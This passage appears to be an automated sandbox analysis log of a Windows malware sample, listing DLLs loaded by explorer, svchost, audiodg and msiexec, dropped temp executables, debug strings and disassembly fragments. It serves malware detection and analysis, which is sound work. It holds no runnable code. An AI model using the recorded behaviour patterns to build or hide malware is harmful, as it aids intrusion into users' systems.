                    Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeSection loaded: libffi-7.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                    Source: 3Qv3xyyL5G.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: 3Qv3xyyL5G.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718679302.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1719019132.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1714525061.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.12.dr
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1715832492.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.12.dr
                    Source: Binary string: ucrtbase.pdb source: 4F82.tmp.zx.exe, 0000000D.00000002.1742961864.00007FFBABB05000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716704355.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1715488670.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1714102710.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.12.dr
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717832720.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718462357.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1719137537.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 4F82.tmp.zx.exe, 0000000D.00000002.1743144237.00007FFBBCF81000.00000002.00000001.01000000.0000000D.sdmp, _ctypes.pyd.12.dr
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716149257.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718036693.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717598102.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1713770843.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718356557.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1715598942.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: vcruntime140.amd64.pdbGCTL source: 4F82.tmp.zx.exe, 0000000C.00000003.1713559075.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000D.00000002.1743510922.00007FFBC31DE000.00000002.00000001.01000000.0000000C.sdmp, VCRUNTIME140.dll.12.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717026450.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1715267455.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1715709268.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718252732.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.12.dr
                    Source: Binary string: .PdB] source: 4F82.tmp.zx.exe.5.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: 25A2.tmp.ssg.exe, 00000006.00000002.1822658401.0000000001153000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1724066272.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.12.dr
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717251759.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.12.dr
                    Source: Binary string: ucrtbase.pdbUGP source: 4F82.tmp.zx.exe, 0000000D.00000002.1742961864.00007FFBABB05000.00000002.00000001.01000000.0000000A.sdmp
                    Source: Binary string: vcruntime140.amd64.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1713559075.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, 4F82.tmp.zx.exe, 0000000D.00000002.1743510922.00007FFBC31DE000.00000002.00000001.01000000.0000000C.sdmp, VCRUNTIME140.dll.12.dr
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1719456434.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716038423.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717728480.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716919388.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1715383363.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ServiceModel.pdb source: 25A2.tmp.ssg.exe, 00000006.00000002.1834821304.0000000006223000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718142742.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.12.dr
                    Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 4F82.tmp.zx.exe, 0000000D.00000002.1742366761.00007FFBAA8DD000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1714317298.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718786664.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716582667.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717144608.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.12.dr
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716816442.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1719807537.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717361519.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717934475.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1717474841.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1715936090.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718898894.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716463638.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1716359569.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.12.dr
                    Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1724976158.00000121A74A8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1718566536.00000121A749F000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.12.dr
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 4F82.tmp.zx.exe, 0000000C.00000003.1719315915.00000121A749F000.00000004.00000020.00020000.00000000.sdmp
                    Source: 25A2.tmp.ssg.exe.5.drStatic PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF7853114EC LoadLibraryA,GetProcAddress,0_2_00007FF7853114EC
                    Source: 3Qv3xyyL5G.exeStatic PE information: section name: .x64
                    Source: 65D35BAB97073674480464.exe.0.drStatic PE information: section name: .x64
                    Source: 5995.tmp.update.exe.5.drStatic PE information: section name: .x64
                    Source: libcrypto-1_1.dll.12.drStatic PE information: section name: .00cfg
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF78531EA72 push rbp; iretd 0_2_00007FF78531EA73
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF78531EC71 push rcx; iretd 0_2_00007FF78531EC72
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF78531EC20 push 00000041h; ret 0_2_00007FF78531EC24
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF78531EC09 push rbp; iretd 0_2_00007FF78531EC0A
                    Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF67E6DEA72 push rbp; iretd 2_2_00007FF67E6DEA73
                    Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF67E6DEC71 push rcx; iretd 2_2_00007FF67E6DEC72
                    Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF67E6DEC20 push 00000041h; ret 2_2_00007FF67E6DEC24
                    Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF67E6DEC09 push rbp; iretd 2_2_00007FF67E6DEC0A
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF300 push rsi; retf 5_2_0B0CF303
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF318 push rbp; retf 5_2_0B0CF31B
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF320 push rsi; retf 5_2_0B0CF323
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0E0B20 push rsi; retf 5_2_0B0E0B23
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0E0B20 push rdi; retf 5_2_0B0E0B6B
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF348 push rbp; retf 5_2_0B0CF32B
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF348 push rbp; retf 5_2_0B0CF363
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0E0B48 push rbp; retf 5_2_0B0E0B53
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF340 push rbp; retf 5_2_0B0CF343
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF350 push rbp; retf 5_2_0B0CF353
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF360 push rbp; retf 5_2_0B0CF363
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0E0B60 push rdi; retf 5_2_0B0E0B73
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF378 push rbp; retf 5_2_0B0CF363
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF378 push rbp; retf 5_2_0B0CF37B
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF380 push rbp; retf 5_2_0B0CF383
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF390 push rbp; retf 5_2_0B0CF393
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0E0BB8 push rbp; retf 5_2_0B0E0BBB
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF3D8 push rbp; retf 5_2_0B0CF36B
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0E0BD0 push rbp; retf 5_2_0B0E0BD3
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF218 push rbp; retf 5_2_0B0CF21B
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF210 push rbp; retf 5_2_0B0CF213
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF230 push rsi; retf 5_2_0B0CF233
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0CF270 push rbp; retf 5_2_0B0CF273
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\VCRUNTIME140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\_ctypes.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\unicodedata.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\python38.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5995.tmp.update.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\_socket.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
